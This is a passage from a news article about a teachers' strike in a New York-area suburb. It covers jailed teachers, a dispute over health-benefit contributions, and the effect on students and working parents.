 teachers' morale is going to be shot.

 But parents and administrators say the teachers' timing couldn't be
 worse, with layoffs at nearby computer firms and families still shaken
 by the death of more than 30 local residents in the World Trade Center
 attacks.

 And there is no end in sight.

 It's become a war, said plain-spoken, chain-smoking school Supt.
 Jack DeTalvo, shortly before getting on the phone to give instructions
 to the board's attorney about how to garner the best coverage on local
 evening news shows.

 One thing all sides agree on: If and when the contentious job action
 ends, the bitterness could leach into the classroom.

 The strike has left 10,500 students out of school in this sprawling
 suburb of 70,000 an hour and a half south of New York City. With
 record-breaking warm weather, the days off are a treat for the
 children but a hardship for working parents, who range from truck
 drivers to Wall Street investment brokers.

 In addition, state law dictates that all missed school days are made
 up at the end of the year.

 Teachers counter that a few days of inconvenience is minor compared to
 being hauled off in handcuffs.

 I'm a soccer mom, I drive a van and I have a dog, science teacher
 Katie Connelly said with a rueful laugh as she sat waiting to go to
 jail. But this is our revolution. . . . The only way you get respect
 is if you stand up for yourself.

 Dispute Over Who Pays Health Benefits

 At the heart of the dispute is a demand by the school board that the
 union members pay a percentage of rising health benefits instead of
 a flat annual fee of $250. The strikers angrily respond that they
 will end up having to pay up to $600 extra for benefits, which would
 effectively cancel out wage increases. The teachers have been offered
 pay raises of 3.8%, 4% and 4.2% over three years.

 The teachers went on strike for a short time three years ago. They
 said the board at that time had ignored the recommendations of a
 fact-finder and instead imposed a contract on them that, by law, they
 said they had to accept. This time, the union is calling for binding
 arbitration, which the school board has refused, insisting that the
 teachers return to class first. snip